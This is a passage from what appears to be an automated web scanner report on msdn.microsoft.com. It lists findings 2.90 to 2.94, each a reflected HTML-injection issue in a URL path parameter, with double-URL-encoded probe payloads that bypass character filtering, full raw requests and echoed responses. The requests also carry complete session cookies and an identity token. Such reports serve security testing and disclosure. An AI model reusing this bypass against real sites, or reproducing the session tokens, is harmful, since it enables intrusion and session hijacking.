R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee663300(VS.85).aspxfa396"><a>ddc59ddb169" />
...[SNIP]...

2.90. http://msdn.microsoft.com/en-us/library/ee702802.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee702802.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66b35%2522%253e%253ca%253e93ed8ded15d was submitted in the REST URL parameter 1. This input was echoed as 66b35"><a>93ed8ded15d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us66b35%2522%253e%253ca%253e93ed8ded15d/library/ee702802.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us66b35"><a>93ed8ded15d/library/ee702802" />
...[SNIP]...

2.91. http://msdn.microsoft.com/en-us/library/ee702802.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee702802.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5f19%2522%253e%253ca%253e937c58c4d40 was submitted in the REST URL parameter 2. This input was echoed as a5f19"><a>937c58c4d40 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/librarya5f19%2522%253e%253ca%253e937c58c4d40/ee702802.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya5f19"><a>937c58c4d40/ee702802" />
...[SNIP]...

2.92. http://msdn.microsoft.com/en-us/library/ee702802.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee702802.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cc52%2522%253e%253ca%253edf492255170 was submitted in the REST URL parameter 3. This input was echoed as 7cc52"><a>df492255170 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ee702802.aspx7cc52%2522%253e%253ca%253edf492255170 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee702802.aspx7cc52"><a>df492255170" />
...[SNIP]...

2.93. http://msdn.microsoft.com/en-us/library/ee721044.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee721044.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa9e1%2522%253e%253ca%253e80d9957f887 was submitted in the REST URL parameter 1. This input was echoed as aa9e1"><a>80d9957f887 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usaa9e1%2522%253e%253ca%253e80d9957f887/library/ee721044.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usaa9e1"><a>80d9957f887/library/ee721044" />
...[SNIP]...

2.94. http://msdn.microsoft.com/en-us/library/ee721044.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee721044.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2341c%2522%253e%253ca%253efc838b46606 was submitted in the REST URL parameter 2. This input was echoed as 2341c"><a>fc838b46606 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library2341c%2522%253e%253ca%253efc838b46606/ee721044.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2341c"><a>fc838b46606/ee721044" />
